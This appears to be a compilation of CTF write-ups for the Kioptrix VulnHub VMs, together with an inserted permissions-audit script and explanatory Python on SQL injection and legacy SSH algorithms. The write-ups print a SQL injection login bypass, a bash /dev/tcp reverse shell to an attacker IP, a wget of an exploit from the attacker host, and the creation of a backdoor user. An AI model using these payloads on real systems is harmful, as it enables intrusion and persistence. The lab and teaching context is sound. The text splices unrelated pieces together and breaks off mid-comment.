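    fs, proc = os.path.join(base, "fs"), os.path.join(base, "proc")
    touch("fs/usr/bin/passwd", 0o4755)           # on the baseline: not reported
    touch("fs/usr/local/bin/backup", 0o4755)     # unexpected setuid helper: reported
    agent = touch("fs/opt/agent/run.sh", 0o777)  # world-writable executable: reported
    for rel, mode in (("tmp", 0o1777), ("opt/drop", 0o777)):  # sticky /tmp is fine, opt/drop is not
        os.makedirs(os.path.join(fs, rel))
        os.chmod(os.path.join(fs, rel), mode)
    os.makedirs(os.path.join(proc, "4242"))      # fake root process running the agent script
    with open(os.path.join(proc, "4242/status"), "w") as fh:
        fh.write("Name:\trun.sh\nUid:\t0\t0\t0\t0\n")
    os.symlink(agent, os.path.join(proc, "4242/exe"))
    os.umask(old_umask)
    return fs, proc


def run_demo():
    """Audit the constructed tree; returns (filesystem findings, process findings)."""
    with tempfile.TemporaryDirectory() as base:
        fs, proc = build_demo(base)
        return audit_tree(fs), audit_processes(proc)


if __name__ == "__main__":
    tree, procs = run_demo()
    print(*tree, *[("root-process", exe, perm) for _, exe, perm in procs], sep="\n")
```

Running audit_tree("/") and audit_processes() on a real host performs the same checks against that host.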

 

 

 

That's all.

[WriteUp] Kioptrix Level 1.1

Introduction

Another revenge attempt from a while back.

Playing the Kioptrix sequel on my own.

 

 

Tools used

nmap

nikto

dirb

Reconnaissance

% nmap -sS -sV -A -T5 -p 1-20000 192.168.3.30
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-28 11:15 EDT
Nmap scan report for 192.168.3.30
Host is up (0.0012s latency).
Not shown: 9993 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
80/tcp open http Apache httpd 2.0.52 *1
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/https?
631/tcp open ipp CUPS 1.1
784/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:EF:7A:CC (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.49 seconds

As a result, the running services are:

22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
80/tcp open http Apache httpd 2.0.52 *2
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/https?
631/tcp open ipp CUPS 1.1
784/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)

% dirb http://192.168.3.30

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Mar 28 11:15:48 2020
URL_BASE: http://192.168.3.30/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.3.30/ ----
+ http://192.168.3.30/cgi-bin/ (CODE:403|SIZE:288)
+ http://192.168.3.30/index.php (CODE:200|SIZE:667)
==> DIRECTORY: http://192.168.3.30/manual/
+ http://192.168.3.30/usage (CODE:403|SIZE:285)

---- Entering directory: http://192.168.3.30/manual/ ----
==> DIRECTORY: http://192.168.3.30/manual/de/
==> DIRECTORY: http://192.168.3.30/manual/developer/
==> DIRECTORY: http://192.168.3.30/manual/en/
==> DIRECTORY: http://192.168.3.30/manual/faq/
==> DIRECTORY: http://192.168.3.30/manual/fr/
==> DIRECTORY: http://192.168.3.30/manual/howto/
==> DIRECTORY: http://192.168.3.30/manual/images/
+ http://192.168.3.30/manual/index.html (CODE:200|SIZE:7234)
==> DIRECTORY: http://192.168.3.30/manual/ja/
==> DIRECTORY: http://192.168.3.30/manual/ko/
+ http://192.168.3.30/manual/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/misc/
==> DIRECTORY: http://192.168.3.30/manual/mod/
==> DIRECTORY: http://192.168.3.30/manual/programs/
==> DIRECTORY: http://192.168.3.30/manual/ru/
==> DIRECTORY: http://192.168.3.30/manual/ssl/
==> DIRECTORY: http://192.168.3.30/manual/style/

---- Entering directory: http://192.168.3.30/manual/de/ ----
+ http://192.168.3.30/manual/de/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/de/developer/
+ http://192.168.3.30/manual/de/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/de/faq/
+ http://192.168.3.30/manual/de/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/de/howto/
==> DIRECTORY: http://192.168.3.30/manual/de/images/
+ http://192.168.3.30/manual/de/index.html (CODE:200|SIZE:7317)
+ http://192.168.3.30/manual/de/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/de/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/de/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/de/misc/
==> DIRECTORY: http://192.168.3.30/manual/de/mod/
==> DIRECTORY: http://192.168.3.30/manual/de/programs/
+ http://192.168.3.30/manual/de/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/de/ssl/
==> DIRECTORY: http://192.168.3.30/manual/de/style/

---- Entering directory: http://192.168.3.30/manual/developer/ ----
+ http://192.168.3.30/manual/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.3.30/manual/en/ ----
+ http://192.168.3.30/manual/en/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/en/developer/
+ http://192.168.3.30/manual/en/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/en/faq/
+ http://192.168.3.30/manual/en/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/en/howto/
==> DIRECTORY: http://192.168.3.30/manual/en/images/
+ http://192.168.3.30/manual/en/index.html (CODE:200|SIZE:7234)
+ http://192.168.3.30/manual/en/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/en/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/en/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/en/misc/
==> DIRECTORY: http://192.168.3.30/manual/en/mod/
==> DIRECTORY: http://192.168.3.30/manual/en/programs/
+ http://192.168.3.30/manual/en/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/en/ssl/
==> DIRECTORY: http://192.168.3.30/manual/en/style/

---- Entering directory: http://192.168.3.30/manual/faq/ ----
+ http://192.168.3.30/manual/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.3.30/manual/fr/ ----
+ http://192.168.3.30/manual/fr/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/fr/developer/
+ http://192.168.3.30/manual/fr/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/fr/faq/
+ http://192.168.3.30/manual/fr/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/fr/howto/
==> DIRECTORY: http://192.168.3.30/manual/fr/images/
+ http://192.168.3.30/manual/fr/index.html (CODE:200|SIZE:7234)
+ http://192.168.3.30/manual/fr/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/fr/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/fr/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/fr/misc/
==> DIRECTORY: http://192.168.3.30/manual/fr/mod/
==> DIRECTORY: http://192.168.3.30/manual/fr/programs/
+ http://192.168.3.30/manual/fr/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/fr/ssl/
==> DIRECTORY: http://192.168.3.30/manual/fr/style/

---- Entering directory: http://192.168.3.30/manual/howto/ ----
+ http://192.168.3.30/manual/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.3.30/manual/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/ja/ ----
+ http://192.168.3.30/manual/ja/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ja/developer/
+ http://192.168.3.30/manual/ja/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ja/faq/
+ http://192.168.3.30/manual/ja/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ja/howto/
==> DIRECTORY: http://192.168.3.30/manual/ja/images/
+ http://192.168.3.30/manual/ja/index.html (CODE:200|SIZE:7227)
+ http://192.168.3.30/manual/ja/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ja/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ja/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/ja/misc/
==> DIRECTORY: http://192.168.3.30/manual/ja/mod/
==> DIRECTORY: http://192.168.3.30/manual/ja/programs/
+ http://192.168.3.30/manual/ja/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ja/ssl/
==> DIRECTORY: http://192.168.3.30/manual/ja/style/

---- Entering directory: http://192.168.3.30/manual/ko/ ----
+ http://192.168.3.30/manual/ko/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ko/developer/
+ http://192.168.3.30/manual/ko/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ko/faq/
+ http://192.168.3.30/manual/ko/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ko/howto/
==> DIRECTORY: http://192.168.3.30/manual/ko/images/
+ http://192.168.3.30/manual/ko/index.html (CODE:200|SIZE:6954)
+ http://192.168.3.30/manual/ko/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ko/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ko/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/ko/misc/
==> DIRECTORY: http://192.168.3.30/manual/ko/mod/
==> DIRECTORY: http://192.168.3.30/manual/ko/programs/
+ http://192.168.3.30/manual/ko/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ko/ssl/
==> DIRECTORY: http://192.168.3.30/manual/ko/style/

---- Entering directory: http://192.168.3.30/manual/misc/ ----
+ http://192.168.3.30/manual/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.3.30/manual/mod/ ----
+ http://192.168.3.30/manual/mod/index.html (CODE:200|SIZE:13437)

---- Entering directory: http://192.168.3.30/manual/programs/ ----
+ http://192.168.3.30/manual/programs/index.html (CODE:200|SIZE:4664)

---- Entering directory: http://192.168.3.30/manual/ru/ ----
+ http://192.168.3.30/manual/ru/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ru/developer/
+ http://192.168.3.30/manual/ru/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ru/faq/
+ http://192.168.3.30/manual/ru/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ru/howto/
==> DIRECTORY: http://192.168.3.30/manual/ru/images/
+ http://192.168.3.30/manual/ru/index.html (CODE:200|SIZE:7277)
+ http://192.168.3.30/manual/ru/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ru/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ru/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/ru/misc/
==> DIRECTORY: http://192.168.3.30/manual/ru/mod/
==> DIRECTORY: http://192.168.3.30/manual/ru/programs/
+ http://192.168.3.30/manual/ru/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ru/ssl/
==> DIRECTORY: http://192.168.3.30/manual/ru/style/

---- Entering directory: http://192.168.3.30/manual/ssl/ ----
+ http://192.168.3.30/manual/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.3.30/manual/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/de/developer/ ----
+ http://192.168.3.30/manual/de/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.3.30/manual/de/faq/ ----
+ http://192.168.3.30/manual/de/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.3.30/manual/de/howto/ ----
+ http://192.168.3.30/manual/de/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.3.30/manual/de/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/de/misc/ ----
+ http://192.168.3.30/manual/de/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.3.30/manual/de/mod/ ----
+ http://192.168.3.30/manual/de/mod/index.html (CODE:200|SIZE:13561)

---- Entering directory: http://192.168.3.30/manual/de/programs/ ----
+ http://192.168.3.30/manual/de/programs/index.html (CODE:200|SIZE:4664)

---- Entering directory: http://192.168.3.30/manual/de/ssl/ ----
+ http://192.168.3.30/manual/de/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.3.30/manual/de/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/en/developer/ ----
+ http://192.168.3.30/manual/en/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.3.30/manual/en/faq/ ----
+ http://192.168.3.30/manual/en/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.3.30/manual/en/howto/ ----
+ http://192.168.3.30/manual/en/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.3.30/manual/en/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/en/misc/ ----
+ http://192.168.3.30/manual/en/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.3.30/manual/en/mod/ ----
+ http://192.168.3.30/manual/en/mod/index.html (CODE:200|SIZE:13437)

---- Entering directory: http://192.168.3.30/manual/en/programs/ ----
+ http://192.168.3.30/manual/en/programs/index.html (CODE:200|SIZE:4664)

---- Entering directory: http://192.168.3.30/manual/en/ssl/ ----
+ http://192.168.3.30/manual/en/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.3.30/manual/en/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/fr/developer/ ----
+ http://192.168.3.30/manual/fr/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.3.30/manual/fr/faq/ ----
+ http://192.168.3.30/manual/fr/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.3.30/manual/fr/howto/ ----
+ http://192.168.3.30/manual/fr/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.3.30/manual/fr/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/fr/misc/ ----
+ http://192.168.3.30/manual/fr/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.3.30/manual/fr/mod/ ----
+ http://192.168.3.30/manual/fr/mod/index.html (CODE:200|SIZE:13437)

---- Entering directory: http://192.168.3.30/manual/fr/programs/ ----
+ http://192.168.3.30/manual/fr/programs/index.html (CODE:200|SIZE:4664)

---- Entering directory: http://192.168.3.30/manual/fr/ssl/ ----
+ http://192.168.3.30/manual/fr/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.3.30/manual/fr/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/ja/developer/ ----
+ http://192.168.3.30/manual/ja/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.3.30/manual/ja/faq/ ----
+ http://192.168.3.30/manual/ja/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.3.30/manual/ja/howto/ ----
+ http://192.168.3.30/manual/ja/howto/index.html (CODE:200|SIZE:5607)

---- Entering directory: http://192.168.3.30/manual/ja/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/ja/misc/ ----
+ http://192.168.3.30/manual/ja/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.3.30/manual/ja/mod/ ----
+ http://192.168.3.30/manual/ja/mod/index.html (CODE:200|SIZE:13298)

---- Entering directory: http://192.168.3.30/manual/ja/programs/ ----
+ http://192.168.3.30/manual/ja/programs/index.html (CODE:200|SIZE:4664)

---- Entering directory: http://192.168.3.30/manual/ja/ssl/ ----
+ http://192.168.3.30/manual/ja/ssl/index.html (CODE:200|SIZE:3957)

---- Entering directory: http://192.168.3.30/manual/ja/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/ko/developer/ ----
+ http://192.168.3.30/manual/ko/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.3.30/manual/ko/faq/ ----
+ http://192.168.3.30/manual/ko/faq/index.html (CODE:200|SIZE:3371)

---- Entering directory: http://192.168.3.30/manual/ko/howto/ ----
+ http://192.168.3.30/manual/ko/howto/index.html (CODE:200|SIZE:5299)

---- Entering directory: http://192.168.3.30/manual/ko/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/ko/misc/ ----
+ http://192.168.3.30/manual/ko/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.3.30/manual/ko/mod/ ----
+ http://192.168.3.30/manual/ko/mod/index.html (CODE:200|SIZE:12795)

---- Entering directory: http://192.168.3.30/manual/ko/programs/ ----
+ http://192.168.3.30/manual/ko/programs/index.html (CODE:200|SIZE:4543)

---- Entering directory: http://192.168.3.30/manual/ko/ssl/ ----
+ http://192.168.3.30/manual/ko/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.3.30/manual/ko/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/ru/developer/ ----
+ http://192.168.3.30/manual/ru/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.3.30/manual/ru/faq/ ----
+ http://192.168.3.30/manual/ru/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.3.30/manual/ru/howto/ ----
+ http://192.168.3.30/manual/ru/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.3.30/manual/ru/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/ru/misc/ ----
+ http://192.168.3.30/manual/ru/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.3.30/manual/ru/mod/ ----
+ http://192.168.3.30/manual/ru/mod/index.html (CODE:200|SIZE:13437)

---- Entering directory: http://192.168.3.30/manual/ru/programs/ ----
+ http://192.168.3.30/manual/ru/programs/index.html (CODE:200|SIZE:5016)

---- Entering directory: http://192.168.3.30/manual/ru/ssl/ ----
+ http://192.168.3.30/manual/ru/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.3.30/manual/ru/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sat Mar 28 11:33:05 2020
DOWNLOADED: 262884 - FOUND: 102

Result: nothing of particular interest.

% nikto 192.168.3.30

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.3.30
+ Target Hostname: 192.168.3.30
+ Target Port: 80
+ Start Time: 2020-03-28 20:56:51 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.0.52 (CentOS)
+ Retrieved x-powered-by header: PHP/4.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 357810, size: 4872, mtime: Sat Mar 29 13:41:04 1980
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 1 error(s) and 17 item(s) reported on remote host
+ End Time: 2020-03-28 20:58:08 (GMT-4) (77 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Result: nothing of particular interest here either.

Checking in a browser the normal way, something that looks like a login screen comes up.

Intrusion

Trying to get in over SSH

kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$ ssh 192.168.3.30
kali@192.168.3.30's password:
Permission denied, please try again.
kali@192.168.3.30's password:
Permission denied, please try again.
kali@192.168.3.30's password:
kali@192.168.3.30: Permission denied (publickey,gssapi-with-mic,password).
kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$ ssh admin@192.168.3.30
admin@192.168.3.30's password:
Permission denied, please try again.
admin@192.168.3.30's password:
Permission denied, please try again.
admin@192.168.3.30's password:
admin@192.168.3.30: Permission denied (publickey,gssapi-with-mic,password).
kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$ ssh root@192.168.3.30
root@192.168.3.30's password:
Permission denied, please try again.
root@192.168.3.30's password:
Permission denied, please try again.
root@192.168.3.30's password:
root@192.168.3.30: Permission denied (publickey,gssapi-with-mic,password).
kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$

Since password authentication is enabled, brute force would probably work too, but I'll leave that for later.

Trying to get in through the browser

Logging in with a few usernames came to nothing, so I try SQL injection.

ID: ' OR 1 = 1 --

PW: ' OR 1 = 1 --

Result: the authentication page was bypassed.

As the next screen, a WebConsole page is displayed.
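Why that payload gets past the login, as an added example that is not the Kioptrix application's code: the string-concatenated query it exploits beside the parameterised query that defeats it, modelled in Python's sqlite3 because the target's real query and table are not shown; the table, the user and its password are constructed.

```python
import sqlite3

# The exact payload the post entered into both the ID and PW fields.
BYPASS = "' OR 1 = 1 --"


def setup_db() -> sqlite3.Connection:
    """Constructed one-row user table standing in for the application's user store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'constructed-pw')")
    conn.commit()
    return conn


def login_concat(conn: sqlite3.Connection, user: str, pw: str) -> bool:
    """Vulnerable pattern: the form fields are spliced straight into the SQL text.

    With BYPASS in both fields the statement the database sees is
        SELECT username FROM users WHERE username='' OR 1 = 1 --' AND password=...
    Everything after -- is a comment, so the password test disappears and
    OR 1 = 1 is always true: any stored row satisfies the query and the check passes.
    """
    sql = ("SELECT username FROM users WHERE username='" + user
           + "' AND password='" + pw + "'")
    return conn.execute(sql).fetchone() is not None


def login_param(conn: sqlite3.Connection, user: str, pw: str) -> bool:
    """Fixed pattern: bound parameters keep the input as data, never as SQL syntax.

    The same payload is now compared literally against the stored username and
    password, matches nothing, and the login fails.
    """
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (user, pw)).fetchone() is not None


def demo() -> dict:
    """Run both forms against the legitimate credentials and the bypass payload."""
    conn = setup_db()
    return {
        "concat_valid": login_concat(conn, "admin", "constructed-pw"),
        "concat_bypass": login_concat(conn, BYPASS, BYPASS),
        "param_valid": login_param(conn, "admin", "constructed-pw"),
        "param_bypass": login_param(conn, BYPASS, BYPASS),
    }
```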

 

Referring to the reverse shell cheat sheet from pentestmonkey,

I try a bash reverse shell.

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

The bash one is this:

bash -i >& /dev/tcp/192.168.3.27/8080 0>&1

On the Kali side, wait for it with nc:

% nc -l 192.168.3.27 -p 8080

Then run the reverse-shell bash line above with a ; added in front.

The browser hangs on loading, and a bash shell comes up on the Kali side.

kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$ nc -l -p 8080
bash: no job control in this shell
bash-3.00$ whoami
apache
bash-3.00$

Privilege escalation

Poking around with privilege escalation in mind, the OS information is written in the following file:

% cat /etc/redhat-release

bash-3.00$ cat redhat-release
CentOS release 4.5 (Final)

To see whether privilege escalation is possible on the version written there,

I searched with searchsploit and found code.

The upper one of these: the exploit code.

Since that code runs locally,

I start a simple server on Kali and transfer it:

% python -m SimpleHTTPServer 8080

On the server, change to /tmp and:

% wget "http://192.168.3.27:8080/9542.c"

Compile the code that was sent over and run it:

gcc -o exploit 9542.c

./exploit

I was able to go all the way to obtaining privileges.

After this

・Create a backdoor

・Study by checking other people's writeups

・Solve it without the tools already used

...and so on; I'd like to do all that.

That's all.

Kioptrix1: what to do after taking root (creating a user, SSH connection, etc.)

I've grabbed root for now, but...

※Honestly, one shot with OpenFuck is a bit too anticlimactic...

So, I check what comes after: building a backdoor and so on.

Also, samba wasn't working properly, so I want to check that too.

Creating a user

For creating the user, assume the state of having gotten in as root via OpenFuck.

To add a user I ran useradd, but it isn't found.

Here, on the off chance, I try adding a few directories to PATH:

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

The sbin directories are supposedly on PATH normally when you're root, but...

Trying again with this, useradd could be run.

useradd kali

passwd kali

Creating the backdoor user is done.

Allowing SSH

I was able to log in as root using the exploit code, but

it's still a reverse shell state, and I can't connect directly.

I want to log in remotely over SSH as the user I just created...

but I get rejected with an error.

kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1$ ssh test@192.168.3.29
Unable to negotiate with 192.168.3.29 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1

I don't quite understand this error...

The remote side offers a few choices of key exchange method, but I don't have them??

Googling turned up the following:

https://unix.stackexchange.com/questions/340844/how-to-enable-diffie-hellman-group1-sha1-key-exchange-on-debian-8-0

The cause is that the key exchange protocol the server side demands is too old.

Kioptrix is indeed a pretty old machine, so that makes sense...

So, I add the old key exchange that is being requested:

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 192.168.3.29

Then, yet another error:

kali@kali:/etc/ssh$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 192.168.3.29
Unable to negotiate with 192.168.3.29 port 22: no matching cipher found. Their offer: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael128-cbc,rijndael192-cbc,rijndael256-cbc,rijndael-cbc@lysator.liu.se

This is the same kind of case: the cipher the server side demands is too old and gets rejected.

Add it via an argument as well:

kali@kali:/etc/ssh$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oCiphers=+aes128-cbc 192.168.3.29
The authenticity of host '192.168.3.29 (192.168.3.29)' can't be established.
RSA key fingerprint is SHA256:VDo/h/SG4A6H+WPH3LsQqw1jwjyseGYq9nLeRWPCY/A.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.3.29' (RSA) to the list of known hosts.
kali@192.168.3.29's password:
unknown terminal "xterm-256color"
unknown terminal "xterm-256color"
[kali@kioptrix kali]$

Finally connected!!!
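Both negotiation failures above follow one pattern, so here is an added example (not code from OpenSSH or the VM) that reads the two error lines as captured in the post and derives the -o options to add, choosing the strongest algorithm the legacy server offers; the preference ranking is an assumption, and the "Their offer" lists double as an inventory of the server's outdated algorithms.

```python
import re
from typing import Dict, List, Optional, Tuple

# Captured output from the post, copied verbatim (two separate ssh attempts).
ERRORS = [
    "Unable to negotiate with 192.168.3.29 port 22: no matching key exchange method "
    "found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1",
    "Unable to negotiate with 192.168.3.29 port 22: no matching cipher found. Their "
    "offer: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,"
    "rijndael128-cbc,rijndael192-cbc,rijndael256-cbc,rijndael-cbc@lysator.liu.se",
]

# OpenSSH names the failed negotiation stage in the message; map each to the
# ssh_config keyword that controls that stage.
OPTION_FOR = {
    "key exchange method": "KexAlgorithms",
    "cipher": "Ciphers",
    "host key type": "HostKeyAlgorithms",
    "MAC": "MACs",
}
_ERR_RE = re.compile(r"no matching (.+?) found\. Their offer: (\S+)")

# Assumed ranking, best first. Group exchange lets the client negotiate a larger
# modulus than group1's fixed 1024-bit one; AES-CBC beats 3DES. RC4 (arcfour),
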